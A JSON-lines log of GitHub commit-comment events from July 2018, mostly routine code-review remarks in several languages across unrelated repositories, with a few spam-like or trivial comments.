{"id":"7911745089","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29578727,"position":21,"line":21,"path":"NET.S.2018.Lyubchenko.03/RootCalculator/RootCalculator.cs","commit_id":"2d2e0637469b8c8c90bfb2c69a98f424b9930cef","created_at":"2018-07-03T10:44:55Z","updated_at":"2018-07-03T10:44:55Z","author_association":"OWNER","body":"Выполнено"}},"created_at":"2018-07-03T10:44:55Z"}
{"id":"7911752437","type":"CommitCommentEvent","actor":{"login":"zcorpan"},"repo":{"name":"whatwg/html"},"payload":{"comment":{"id":29578739,"position":null,"line":null,"path":null,"commit_id":"4e9c466713c4ce8e07a55effaf2a6f4bfd42669c","created_at":"2018-07-03T10:46:29Z","updated_at":"2018-07-03T10:46:29Z","author_association":"MEMBER","body":"I think I prefer a normal revert. "}},"created_at":"2018-07-03T10:46:29Z"}
{"id":"7911759725","type":"CommitCommentEvent","actor":{"login":"v0dro"},"repo":{"name":"pgtgrly/GRruby-extension"},"payload":{"comment":{"id":29578746,"position":20,"line":31,"path":"spec/scripting_layer/single_plot_graph_spec.rb","commit_id":"4a4d4bb15ab4cb18fa7111e5959582fdcb001914","created_at":"2018-07-03T10:48:01Z","updated_at":"2018-07-03T10:48:01Z","author_association":"COLLABORATOR","body":"You can write a separate method that accepts a block and calls `File.delete` after calling the block. So basically, the new method would rest in `spec_helper` and be accessible to all tests. It would look like so:\r\n``` ruby\r\ndef compare_images generated_file, original_file, &block\r\n  block.call(generated_file, original_file)\r\n  File.delete generated_file\r\nend\r\n```\r\n\r\nAnd then your test would like:\r\n``` ruby\r\nit \"tests something\" do\r\n  compare_images(\"file_name.bmp\", \"line_marker.bmp\") do |generated, original|\r\n    expect(compare_with_reference?(generated, original, 10)).to eq(true)\r\n  end\r\nend\r\n```\r\n\r\nReduces repetition of code and and makes this simple to modify later."}},"created_at":"2018-07-03T10:48:01Z"}
{"id":"7911764376","type":"CommitCommentEvent","actor":{"login":"nathanaeljones"},"repo":{"name":"imazen/imageflow"},"payload":{"comment":{"id":29578756,"position":4,"line":176,"path":"imageflow_core/src/codecs/mod.rs","commit_id":"f5d8dae1db138d11ecf6bf88f5b04442777cc0c3","created_at":"2018-07-03T10:49:00Z","updated_at":"2018-07-03T10:49:00Z","author_association":"MEMBER","body":"This is part of the decoder - why wouldn't it still be used?"}},"created_at":"2018-07-03T10:49:00Z"}
{"id":"7911765414","type":"CommitCommentEvent","actor":{"login":"Alhadis"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29578759,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-03T10:49:13Z","updated_at":"2018-07-03T10:49:13Z","author_association":"NONE","body":"Only briefly (I don't want to sidetrack this discussion). It required an unusual build system (Neatmake / Neatcc) which couldn't be built (at least not on OpenBSD). I was primarily interested in testing its capabilities to document them for a [JavaScript library](https://github.com/Alhadis/Roff.js) that's designed to be compatible with both current and legacy implementations."}},"created_at":"2018-07-03T10:49:13Z"}
{"id":"7911768017","type":"CommitCommentEvent","actor":{"login":"v0dro"},"repo":{"name":"pgtgrly/GRruby-extension"},"payload":{"comment":{"id":29578761,"position":4,"line":252,"path":"lib/grruby/tasks/GrFunctionsClasses.rb","commit_id":"a3c4ec01ff95392b9ab9808dbfe557b1663ead72","created_at":"2018-07-03T10:49:46Z","updated_at":"2018-07-03T10:49:46Z","author_association":"COLLABORATOR","body":"This file should be named `gr_functions_classes.rb`. And so should all other files (be named camel case)."}},"created_at":"2018-07-03T10:49:46Z"}
{"id":"7911768191","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Ronimeister/NET.S.2018.Kanunnikov.03"},"payload":{"comment":{"id":29578763,"position":11,"line":11,"path":"Algorithms/GCDFinder.cs","commit_id":"4ff58661eda38d9d564017029a28a9a1016daa30","created_at":"2018-07-03T10:49:48Z","updated_at":"2018-07-03T10:49:48Z","author_association":"NONE","body":"Категорически не согласна с публичным api, столько хороших идей отдельных, но все вместе они дали какофонию в коде, увы( Нужно завтра обязательно обговорить!"}},"created_at":"2018-07-03T10:49:48Z"}
{"id":"7911774669","type":"CommitCommentEvent","actor":{"login":"Staars"},"repo":{"name":"Staars/build"},"payload":{"comment":{"id":29578773,"position":null,"line":null,"path":null,"commit_id":"332ebdd67ee7cfd6264a3a52ba591e43fc1ed62d","created_at":"2018-07-03T10:51:12Z","updated_at":"2018-07-03T10:51:12Z","author_association":"OWNER","body":"I will test it, when I'm back home.\r\n\r\nIn the last few weeks I tried many things with the DTS (and the whole BT-WLAN-stack) and experienced a lot of unwanted side effects regarding the WLAN driver. That's why I didn't upload newer versions, even though they are much closer to the DTS from the original Android-vendor-image. Beside that there was for instance often undefined/unexpected behavior of the board LED, which per se is not problem, but shows that I do fishing in the gloomy here.\r\nATM the situation is quite complicated with the frequent changes in the ayufan-repo (sometimes back and forth) an I'm not overly optimistic, that we will find a stable and long-lasting solution.\r\nBut that does not mean, that I will not try it."}},"created_at":"2018-07-03T10:51:12Z"}
{"id":"7911775005","type":"CommitCommentEvent","actor":{"login":"tigrh"},"repo":{"name":"appveyor/website"},"payload":{"comment":{"id":29578775,"position":5,"line":30,"path":"src/docs/deployment/agent.md","commit_id":"15a92b3d74b39a6c4be9afb9c922ebbf5e56d685","created_at":"2018-07-03T10:51:16Z","updated_at":"2018-07-03T10:51:16Z","author_association":"NONE","body":"Играть в вулкан"}},"created_at":"2018-07-03T10:51:16Z"}
{"id":"7911775589","type":"CommitCommentEvent","actor":{"login":"ericjee"},"repo":{"name":"reverson/k8s-device-plugin"},"payload":{"comment":{"id":29578779,"position":null,"line":null,"path":null,"commit_id":"24993ac9b337eecefe653d750acbc1484e40a40e","created_at":"2018-07-03T10:51:23Z","updated_at":"2018-07-03T10:51:23Z","author_association":"NONE","body":"hi reverson, i'm sorry to disturb you, did u figure out how to share single GPU with multiple requests? does this forked repo has something featured for that use case? cause this is our use case but the community seems won't support it until now 😭 "}},"created_at":"2018-07-03T10:51:23Z"}
{"id":"7911778649","type":"CommitCommentEvent","actor":{"login":"Francommit"},"repo":{"name":"PRElias/win10_emulation_station"},"payload":{"comment":{"id":29578788,"position":11,"line":11,"path":"prepare.ps1","commit_id":"5f1a6ed2d43da585b6d854ab0de0503d08a8a71e","created_at":"2018-07-03T10:52:03Z","updated_at":"2018-07-03T10:52:03Z","author_association":"NONE","body":"I have mixed feelings. On one hand MOST people will be using Windows 10 so it shouldn't be an issue. \r\nLet's keep it for now!"}},"created_at":"2018-07-03T10:52:03Z"}
{"id":"7911780957","type":"CommitCommentEvent","actor":{"login":"Francommit"},"repo":{"name":"PRElias/win10_emulation_station"},"payload":{"comment":{"id":29578796,"position":2,"line":2,"path":"prepare.ps1","commit_id":"5f1a6ed2d43da585b6d854ab0de0503d08a8a71e","created_at":"2018-07-03T10:52:33Z","updated_at":"2018-07-03T10:52:33Z","author_association":"NONE","body":"I mean it simply won't work!"}},"created_at":"2018-07-03T10:52:33Z"}
{"id":"7911782898","type":"CommitCommentEvent","actor":{"login":"franz1981"},"repo":{"name":"apache/qpid-jms"},"payload":{"comment":{"id":29578801,"position":37,"line":49,"path":"qpid-jms-client/src/main/java/org/apache/qpid/jms/provider/ProviderFuture.java","commit_id":"c66d888114021da31d9032c841c08903dd31cc89","created_at":"2018-07-03T10:52:59Z","updated_at":"2018-07-03T10:52:59Z","author_association":"NONE","body":"Just a note: `error` could be declared as a plain field (avoiding expensive full barriers due to the volatile store of it).\r\nTo allow atomic write/read of it can be used the acquire/release semantic provided by the Java Memory Model ie `STATE_FIELD_UPDATER.lazySet(this, FAILURE)` will store-release anything written before it (error = result) while `isComplete` (that contains a volatile load of `state`) is load-acquiring anything store-released by `state` (the value of `error`)."}},"created_at":"2018-07-03T10:52:59Z"}
{"id":"7911784453","type":"CommitCommentEvent","actor":{"login":"Alqhtani"},"repo":{"name":"Alqhtani/sqdm-kqsmd-q"},"payload":{"comment":{"id":29578804,"position":null,"line":null,"path":null,"commit_id":"237eee923a425c36a7d6509eba574362fe1ea2fa","created_at":"2018-07-03T10:53:21Z","updated_at":"2018-07-03T10:53:21Z","author_association":"OWNER","body":":r lhfd\r\n"}},"created_at":"2018-07-03T10:53:21Z"}
{"id":"7911784494","type":"CommitCommentEvent","actor":{"login":"Francommit"},"repo":{"name":"PRElias/win10_emulation_station"},"payload":{"comment":{"id":29578805,"position":2,"line":2,"path":"prepare.ps1","commit_id":"5f1a6ed2d43da585b6d854ab0de0503d08a8a71e","created_at":"2018-07-03T10:53:21Z","updated_at":"2018-07-03T10:53:21Z","author_association":"NONE","body":"If you've got a 'stock' Windows 10 PC by default you cannot run a script without setting this OUTSIDE of the script itself."}},"created_at":"2018-07-03T10:53:21Z"}
{"id":"7911784905","type":"CommitCommentEvent","actor":{"login":"tigrh"},"repo":{"name":"appveyor/website"},"payload":{"comment":{"id":29578806,"position":14,"line":57,"path":"Gemfile.lock","commit_id":"1c06e95b5e9b701a58c96e191bf6d1fd1fc258b7","created_at":"2018-07-03T10:53:26Z","updated_at":"2018-07-03T10:53:26Z","author_association":"NONE","body":"2868942@v24"}},"created_at":"2018-07-03T10:53:26Z"}
{"id":"7911786448","type":"CommitCommentEvent","actor":{"login":"thoainguyen"},"repo":{"name":"tvdevice7/test"},"payload":{"comment":{"id":29578810,"position":null,"line":null,"path":null,"commit_id":"43ec095c992747cc33a9841e268ef124fda97889","created_at":"2018-07-03T10:53:47Z","updated_at":"2018-07-03T10:53:47Z","author_association":"NONE","body":"."}},"created_at":"2018-07-03T10:53:47Z"}
{"id":"7911789148","type":"CommitCommentEvent","actor":{"login":"jovial"},"repo":{"name":"stackhpc/ansible-role-os-images"},"payload":{"comment":{"id":29578818,"position":56,"line":190,"path":"tasks/main.yml","commit_id":"e78499a812e9a6370b43e13d33cc1956ebb35987","created_at":"2018-07-03T10:54:24Z","updated_at":"2018-07-03T10:54:24Z","author_association":"CONTRIBUTOR","body":"Good point, just tried this and they differ:\r\n\r\n```\r\n(os2) hpcszum2@eod-control:~/disk_images/wjs$ md5sum *\r\nmd5sum: wjs.d: Is a directory\r\naf0e5d84b080a1566d060db7fade6efd  wjs.initrd\r\nca4fd54b35f4008c5f04d999aab20c67  wjs.qcow2\r\n7419af37a06ecf9dcd413658e49a2466  wjs.vmlinuz\r\n(os2) 1 hpcszum2@eod-control:~/disk_images/wjs$ md5sum ~/old-images/*\r\nmd5sum: /home/hpcszum2/old-images/wjs.d: Is a directory\r\ne0d56499743e4fbd4ed38bc2f12d8ca2  /home/hpcszum2/old-images/wjs.initrd\r\n98dfa1bbed813db7b1d0e1e17db57f1e  /home/hpcszum2/old-images/wjs.qcow2\r\n7419af37a06ecf9dcd413658e49a2466  /home/hpcszum2/old-images/wjs.vmlinuz\r\n```\r\nIs it still worth computing the checksums to save the upload if you don't `force_rebuild`?"}},"created_at":"2018-07-03T10:54:24Z"}
{"id":"7911796935","type":"CommitCommentEvent","actor":{"login":"ws-mps"},"repo":{"name":"unipartdigital/udes-open"},"payload":{"comment":{"id":29578829,"position":320,"line":1095,"path":"addons/udes_core/models/stock_picking.py","commit_id":"e09d5c90b458680e528480b4d135cfc607be2f39","created_at":"2018-07-03T10:56:04Z","updated_at":"2018-07-03T10:56:04Z","author_association":"CONTRIBUTOR","body":"This method already exists in udes_core, this was completely overriding it."}},"created_at":"2018-07-03T10:56:04Z"}
{"id":"7911801894","type":"CommitCommentEvent","actor":{"login":"PRElias"},"repo":{"name":"PRElias/win10_emulation_station"},"payload":{"comment":{"id":29578838,"position":2,"line":2,"path":"prepare.ps1","commit_id":"5f1a6ed2d43da585b6d854ab0de0503d08a8a71e","created_at":"2018-07-03T10:57:09Z","updated_at":"2018-07-03T10:57:09Z","author_association":"OWNER","body":"I see. I'll think better on this one"}},"created_at":"2018-07-03T10:57:09Z"}
{"id":"7911803284","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"ShokoAnime/ShokoDesktop2"},"payload":{"comment":{"id":29578842,"position":null,"line":null,"path":null,"commit_id":"7656f154636e06726c797236a6cd859e1514e87b","created_at":"2018-07-03T10:57:26Z","updated_at":"2018-07-03T10:57:26Z","author_association":"NONE","body":"its happening"}},"created_at":"2018-07-03T10:57:26Z"}
{"id":"7911813117","type":"CommitCommentEvent","actor":{"login":"mathiasbynens"},"repo":{"name":"whatwg/html"},"payload":{"comment":{"id":29578875,"position":null,"line":null,"path":null,"commit_id":"4e9c466713c4ce8e07a55effaf2a6f4bfd42669c","created_at":"2018-07-03T10:59:35Z","updated_at":"2018-07-03T10:59:35Z","author_association":"MEMBER","body":"https://github.com/whatwg/html/pull/3792"}},"created_at":"2018-07-03T10:59:35Z"}
{"id":"7911817031","type":"CommitCommentEvent","actor":{"login":"ramadv1"},"repo":{"name":"ramadv1/storytelling-with-git"},"payload":{"comment":{"id":29578891,"position":null,"line":null,"path":null,"commit_id":"e9bcba7e52c852d141676784337950efee9eb6c5","created_at":"2018-07-03T11:00:22Z","updated_at":"2018-07-03T11:00:22Z","author_association":"OWNER","body":"### **Discovery**\r\n\r\nHow is this for me?\r\n\r\nAlex Lavigne-Gagnon is sharing ways in which he uses git and other tools.  Ananth and I are exploring possibilitues for using git for tracking Printernet dispatches.  I am also thinking about using GSS canvas elements to organize git repositories.\r\n"}},"created_at":"2018-07-03T11:00:22Z"}
{"id":"7911820686","type":"CommitCommentEvent","actor":{"login":"AlekseyZaytcev"},"repo":{"name":"AlekseyZaytcev/rg_codebreaker-web"},"payload":{"comment":{"id":29578896,"position":null,"line":null,"path":null,"commit_id":"7d10edb11bc45d56f79555e928b389b6dc7fd44d","created_at":"2018-07-03T11:01:08Z","updated_at":"2018-07-03T11:01:08Z","author_association":"OWNER","body":"Thx for good idea! ;)"}},"created_at":"2018-07-03T11:01:08Z"}
{"id":"7911822331","type":"CommitCommentEvent","actor":{"login":"lclausen-adi"},"repo":{"name":"analogdevicesinc/linux"},"payload":{"comment":{"id":29578898,"position":465,"line":465,"path":"drivers/iio/frequency/hmc7044.c","commit_id":"17aa144bfb1c1ffac4bd58762d09ee70813e9079","created_at":"2018-07-03T11:01:27Z","updated_at":"2018-07-03T11:01:27Z","author_association":"NONE","body":"This needs to make sure that n1 and r1 stay below N1_MAX and R1_MAX"}},"created_at":"2018-07-03T11:01:27Z"}
{"id":"7911832964","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29578929,"position":23,"line":23,"path":"2-8/2-8.cpp","commit_id":"3bdcbb0b7b18ce3e839c4a8108a7cce3797c30c6","created_at":"2018-07-03T11:03:37Z","updated_at":"2018-07-03T11:03:37Z","author_association":"COLLABORATOR","body":"コメント記入者：卜部\r\nコメントの内容と処理が一致していません。\r\n絶対値の取得はしていないですよね？"}},"created_at":"2018-07-03T11:03:37Z"}
{"id":"7911833015","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29578930,"position":null,"line":null,"path":null,"commit_id":"c3129444ea366607023f0fa6bccddf76ca74792a","created_at":"2018-07-03T11:03:38Z","updated_at":"2018-07-03T11:03:38Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/additional-email-address-per-user-account-support/59847/20\n"}},"created_at":"2018-07-03T11:03:38Z"}
{"id":"7911833058","type":"CommitCommentEvent","actor":{"login":"klaaspieter"},"repo":{"name":"klaaspieter/dotfiles"},"payload":{"comment":{"id":29578931,"position":null,"line":null,"path":null,"commit_id":"1261b608a6d54ccb1b27fc24a84261bc6f326661","created_at":"2018-07-03T11:03:38Z","updated_at":"2018-07-03T11:03:38Z","author_association":"OWNER","body":"No problems so far."}},"created_at":"2018-07-03T11:03:38Z"}
{"id":"7911833810","type":"CommitCommentEvent","actor":{"login":"v0dro"},"repo":{"name":"pgtgrly/GRruby-extension"},"payload":{"comment":{"id":29578932,"position":1,"line":2,"path":"lib/rubyplot/plots/bar.rb","commit_id":"a3c4ec01ff95392b9ab9808dbfe557b1663ead72","created_at":"2018-07-03T11:03:47Z","updated_at":"2018-07-03T11:03:47Z","author_association":"COLLABORATOR","body":"I think we should let the one he's implemented now be since I've seen it used in many libraries."}},"created_at":"2018-07-03T11:03:47Z"}
{"id":"7911836242","type":"CommitCommentEvent","actor":{"login":"lclausen-adi"},"repo":{"name":"analogdevicesinc/linux"},"payload":{"comment":{"id":29578941,"position":465,"line":465,"path":"drivers/iio/frequency/hmc7044.c","commit_id":"17aa144bfb1c1ffac4bd58762d09ee70813e9079","created_at":"2018-07-03T11:04:19Z","updated_at":"2018-07-03T11:04:19Z","author_association":"NONE","body":"Also, the minimum for N1 is 8. Should make sure that it is greater or equal."}},"created_at":"2018-07-03T11:04:19Z"}
{"id":"7911840101","type":"CommitCommentEvent","actor":{"login":"noam-almog"},"repo":{"name":"wix/wix-http-testkit"},"payload":{"comment":{"id":29578945,"position":4,"line":20,"path":"http-testkit-marshaller-jackson/src/main/scala/com/wix/e2e/http/json/JsonJacksonMarshaller.scala","commit_id":"65ad472f40f4444d518cd5e975551138e8a26adb","created_at":"2018-07-03T11:05:08Z","updated_at":"2018-07-03T11:05:08Z","author_association":"MEMBER","body":"@dkomanov  it's not perfect, but ```marshaller.asInstanceOf[JsonJacksonMarshaller].configure```"}},"created_at":"2018-07-03T11:05:08Z"}
{"id":"7911840334","type":"CommitCommentEvent","actor":{"login":"manoj-muddarla"},"repo":{"name":"manoj-muddarla/prac1"},"payload":{"comment":{"id":29578946,"position":null,"line":null,"path":null,"commit_id":"3851b8d81dbe3e243d854aa2eae959244d8bb45a","created_at":"2018-07-03T11:05:11Z","updated_at":"2018-07-03T11:05:11Z","author_association":"OWNER","body":"yer"}},"created_at":"2018-07-03T11:05:11Z"}
{"id":"7911842290","type":"CommitCommentEvent","actor":{"login":"dev-harsh1998"},"repo":{"name":"dev-harsh1998/Transfer"},"payload":{"comment":{"id":29578955,"position":5,"line":92,"path":"transfer.c","commit_id":"954cdc5b9acdb08d32fa654f7cdc9b4222a3ab55","created_at":"2018-07-03T11:05:37Z","updated_at":"2018-07-03T11:05:37Z","author_association":"OWNER","body":";_; prettier sucks"}},"created_at":"2018-07-03T11:05:37Z"}
{"id":"7911843557","type":"CommitCommentEvent","actor":{"login":"lclausen-adi"},"repo":{"name":"analogdevicesinc/linux"},"payload":{"comment":{"id":29578959,"position":499,"line":499,"path":"drivers/iio/frequency/hmc7044.c","commit_id":"17aa144bfb1c1ffac4bd58762d09ee70813e9079","created_at":"2018-07-03T11:05:54Z","updated_at":"2018-07-03T11:05:54Z","author_association":"NONE","body":"We could just increase both n2 and r2 to make sure it is >= N2_MIN."}},"created_at":"2018-07-03T11:05:54Z"}
{"id":"7911844948","type":"CommitCommentEvent","actor":{"login":"bestwebua"},"repo":{"name":"AlekseyZaytcev/rg_codebreaker-web"},"payload":{"comment":{"id":29578964,"position":null,"line":null,"path":null,"commit_id":"7d10edb11bc45d56f79555e928b389b6dc7fd44d","created_at":"2018-07-03T11:06:12Z","updated_at":"2018-07-03T11:06:12Z","author_association":"NONE","body":"Нзчт)"}},"created_at":"2018-07-03T11:06:12Z"}
{"id":"7911845107","type":"CommitCommentEvent","actor":{"login":"g0wfv"},"repo":{"name":"g4klx/MMDVMHost"},"payload":{"comment":{"id":29578966,"position":null,"line":null,"path":null,"commit_id":"758d5b00079dbd0273837dbc24cc87f2be62e56c","created_at":"2018-07-03T11:06:14Z","updated_at":"2018-07-03T11:06:14Z","author_association":"CONTRIBUTOR","body":"Because I'm not a C guru and didn't know the snprintf() function existed!\r\n\r\nMakes sense to me having read what snprintf() does.... Feel free to make it so .... If Jonathan or I don't get to it before you!\r\n\r\n#EveryDayIsASchoolDay"}},"created_at":"2018-07-03T11:06:14Z"}
{"id":"7911846295","type":"CommitCommentEvent","actor":{"login":"orsinium"},"repo":{"name":"orsinium/notes"},"payload":{"comment":{"id":29578967,"position":6,"line":6,"path":"notes-ru/db-models.md","commit_id":"104397ccd93e347a4f0bbd4bc60e94e57b533f11","created_at":"2018-07-03T11:06:29Z","updated_at":"2018-07-03T11:06:29Z","author_association":"OWNER","body":"Спасибо, исправил"}},"created_at":"2018-07-03T11:06:29Z"}
{"id":"7911849565","type":"CommitCommentEvent","actor":{"login":"orsinium"},"repo":{"name":"orsinium/notes"},"payload":{"comment":{"id":29578974,"position":12,"line":12,"path":"notes-ru/db-models.md","commit_id":"104397ccd93e347a4f0bbd4bc60e94e57b533f11","created_at":"2018-07-03T11:07:04Z","updated_at":"2018-07-03T11:07:04Z","author_association":"OWNER","body":"К сожалению, ещё очень много кода на старых версиях django"}},"created_at":"2018-07-03T11:07:04Z"}
{"id":"7911856010","type":"CommitCommentEvent","actor":{"login":"orsinium"},"repo":{"name":"orsinium/notes"},"payload":{"comment":{"id":29578988,"position":14,"line":14,"path":"notes-ru/db-models.md","commit_id":"104397ccd93e347a4f0bbd4bc60e94e57b533f11","created_at":"2018-07-03T11:08:27Z","updated_at":"2018-07-03T11:08:27Z","author_association":"OWNER","body":"Хорошая мысль, добавлю отдельным пунктом."}},"created_at":"2018-07-03T11:08:27Z"}
{"id":"7911858826","type":"CommitCommentEvent","actor":{"login":"Disgame"},"repo":{"name":"Disgame/SalienCheat"},"payload":{"comment":{"id":29578993,"position":null,"line":null,"path":null,"commit_id":"6ca7f6825e52c5074f6b25bb89c236c002346608","created_at":"2018-07-03T11:09:04Z","updated_at":"2018-07-03T11:09:04Z","author_association":"OWNER","body":"So when I run the new update I can't get the full amount of xp ? And other people who doesn't updated there version can get the 1mio?"}},"created_at":"2018-07-03T11:09:04Z"}
{"id":"7911860464","type":"CommitCommentEvent","actor":{"login":"orsinium"},"repo":{"name":"orsinium/notes"},"payload":{"comment":{"id":29578999,"position":8,"line":8,"path":"notes-ru/db-models.md","commit_id":"104397ccd93e347a4f0bbd4bc60e94e57b533f11","created_at":"2018-07-03T11:09:25Z","updated_at":"2018-07-03T11:09:25Z","author_association":"OWNER","body":"Это не грамотно и немного коробит, но не мешает внятности кода. А в прочем, верно, допишу примечание)"}},"created_at":"2018-07-03T11:09:25Z"}
{"id":"7911860911","type":"CommitCommentEvent","actor":{"login":"tuandmcn"},"repo":{"name":"hocchudong/thuctap012017"},"payload":{"comment":{"id":29579000,"position":null,"line":null,"path":null,"commit_id":"8b9d575bf9ca4aea517d1c51d8b75b53ae783c4e","created_at":"2018-07-03T11:09:31Z","updated_at":"2018-07-03T11:09:31Z","author_association":"NONE","body":" BoTranVan hướng dẫn thêm cách cấu hình interface LAN cho bài viết pfsense-captive-portal\r\nLink: https://github.com/hocchudong/thuctap012017/commit/8b9d575bf9ca4aea517d1c51d8b75b53ae783c4e"}},"created_at":"2018-07-03T11:09:31Z"}
{"id":"7911862658","type":"CommitCommentEvent","actor":{"login":"xPaw"},"repo":{"name":"Disgame/SalienCheat"},"payload":{"comment":{"id":29579002,"position":null,"line":null,"path":null,"commit_id":"6ca7f6825e52c5074f6b25bb89c236c002346608","created_at":"2018-07-03T11:09:55Z","updated_at":"2018-07-03T11:09:55Z","author_association":"NONE","body":"In the last boss, people that didn't do damage still got 739787 XP bonus at the end.\r\n\r\nThere's nothing after reaching level 25, so making the boss fights longer just benefits everyone."}},"created_at":"2018-07-03T11:09:55Z"}
{"id":"7911870816","type":"CommitCommentEvent","actor":{"login":"ramadv1"},"repo":{"name":"ramadv1/storytelling-with-git"},"payload":{"comment":{"id":29579014,"position":null,"line":null,"path":null,"commit_id":"122a192df2f9cfd92f24864858c524935682d2f2","created_at":"2018-07-03T11:11:45Z","updated_at":"2018-07-03T11:11:45Z","author_association":"OWNER","body":"### **Awareness**\r\n\r\nIs this for me?\r\n\r\nThe video playlist recommended by Yves Muya-Benda made it easier for me to start exploring github and figure out if it is right for me.\r\nhttps://www.youtube.com/watch?v=BCQHnlnPusY\r\n\r\n#1 "}},"created_at":"2018-07-03T11:11:45Z"}
{"id":"7911872622","type":"CommitCommentEvent","actor":{"login":"Disgame"},"repo":{"name":"Disgame/SalienCheat"},"payload":{"comment":{"id":29579019,"position":null,"line":null,"path":null,"commit_id":"6ca7f6825e52c5074f6b25bb89c236c002346608","created_at":"2018-07-03T11:12:09Z","updated_at":"2018-07-03T11:12:09Z","author_association":"OWNER","body":"Oh ok, that's nice to know. Thanks for ur quick reply"}},"created_at":"2018-07-03T11:12:09Z"}
{"id":"7911876280","type":"CommitCommentEvent","actor":{"login":"ramadv1"},"repo":{"name":"ramadv1/storytelling-with-git"},"payload":{"comment":{"id":29579026,"position":null,"line":null,"path":null,"commit_id":"122a192df2f9cfd92f24864858c524935682d2f2","created_at":"2018-07-03T11:12:57Z","updated_at":"2018-07-03T11:12:57Z","author_association":"OWNER","body":"### **Discovery**\r\n\r\nHow is this for me?\r\n\r\nAlex Lavigne-Gagnon is sharing ways in which he uses git and other tools. Ananth and I are exploring possibilitues for using git for tracking Printernet dispatches. I am also thinking about using GSS canvas elements to organize git repositories.\r\n\r\n#2 "}},"created_at":"2018-07-03T11:12:57Z"}
{"id":"7911876594","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29579029,"position":25,"line":25,"path":"2-9/2-9.cpp","commit_id":"3bdcbb0b7b18ce3e839c4a8108a7cce3797c30c6","created_at":"2018-07-03T11:13:01Z","updated_at":"2018-07-03T11:13:01Z","author_association":"COLLABORATOR","body":"コメント記入者：卜部\r\nこちらも2－8と同じですが、絶対値をとるという処理は組んでいないので、コメントと実装に乖離があります。"}},"created_at":"2018-07-03T11:13:01Z"}
{"id":"7911876763","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"andrej2012/NET.S.2018.Kozlovski.02"},"payload":{"comment":{"id":29579031,"position":11,"line":11,"path":"FirastTask.Tests/NumberClassTests.cs","commit_id":"862e9dc5e175d9d4eea1c00a0ead7e8e1c8191e2","created_at":"2018-07-03T11:13:04Z","updated_at":"2018-07-03T11:13:04Z","author_association":"NONE","body":"Не используется сильная сторона NUnit-а, параметризированные тесты!"}},"created_at":"2018-07-03T11:13:04Z"}
{"id":"7911877549","type":"CommitCommentEvent","actor":{"login":"rajenderdasari123"},"repo":{"name":"rajenderdasari123/Fragment1"},"payload":{"comment":{"id":29579033,"position":3,"line":3,"path":"app/src/main/res/values/strings.xml","commit_id":"16aa8c7129e7690498b280cd61b336e0f5611167","created_at":"2018-07-03T11:13:15Z","updated_at":"2018-07-03T11:13:15Z","author_association":"OWNER","body":"SRIDHAR"}},"created_at":"2018-07-03T11:13:15Z"}
{"id":"7911878459","type":"CommitCommentEvent","actor":{"login":"rajenderdasari123"},"repo":{"name":"rajenderdasari123/Fragment1"},"payload":{"comment":{"id":29579035,"position":3,"line":3,"path":"app/src/main/res/values/strings.xml","commit_id":"16aa8c7129e7690498b280cd61b336e0f5611167","created_at":"2018-07-03T11:13:27Z","updated_at":"2018-07-03T11:13:27Z","author_association":"OWNER","body":"OK"}},"created_at":"2018-07-03T11:13:27Z"}
{"id":"7911880209","type":"CommitCommentEvent","actor":{"login":"daschuer"},"repo":{"name":"mixxxdj/mixxx"},"payload":{"comment":{"id":29579038,"position":11,"line":11,"path":"src/broadcast/networkrequest.h","commit_id":"ba8a6fc86555f743c9280dbecb485576c9fa57ec","created_at":"2018-07-03T11:13:51Z","updated_at":"2018-07-03T11:13:51Z","author_association":"MEMBER","body":"The compiler already has a public destructor. You can just remove the line."}},"created_at":"2018-07-03T11:13:51Z"}
{"id":"7911880294","type":"CommitCommentEvent","actor":{"login":"dkomanov"},"repo":{"name":"wix/wix-http-testkit"},"payload":{"comment":{"id":29579039,"position":4,"line":20,"path":"http-testkit-marshaller-jackson/src/main/scala/com/wix/e2e/http/json/JsonJacksonMarshaller.scala","commit_id":"65ad472f40f4444d518cd5e975551138e8a26adb","created_at":"2018-07-03T11:13:53Z","updated_at":"2018-07-03T11:13:53Z","author_association":"CONTRIBUTOR","body":"And then mutate the ObjectMapper? Why not to pass it in a constructor?"}},"created_at":"2018-07-03T11:13:53Z"}
{"id":"7911881173","type":"CommitCommentEvent","actor":{"login":"GHMeyer0"},"repo":{"name":"GHMeyer0/Boletim_C"},"payload":{"comment":{"id":29579041,"position":83,"line":null,"path":"Disciplina.h","commit_id":"8d427ab2dfdce121f42dcc282da09c35943a0c6a","created_at":"2018-07-03T11:14:05Z","updated_at":"2018-07-03T11:14:05Z","author_association":"OWNER","body":"Verificar o que foi alterado no último commit"}},"created_at":"2018-07-03T11:14:05Z"}
{"id":"7911886140","type":"CommitCommentEvent","actor":{"login":"nourziada"},"repo":{"name":"nourziada/smartbazaar"},"payload":{"comment":{"id":29579051,"position":null,"line":null,"path":null,"commit_id":"f9b97db287ffbc4768942d17667bac45865a1d05","created_at":"2018-07-03T11:15:11Z","updated_at":"2018-07-03T11:15:11Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Admin (Smart Bazaar Cards Payments)](https://trello.com/c/mZsX6nK1/55-admin-smart-bazaar-cards-payments)"}},"created_at":"2018-07-03T11:15:11Z"}
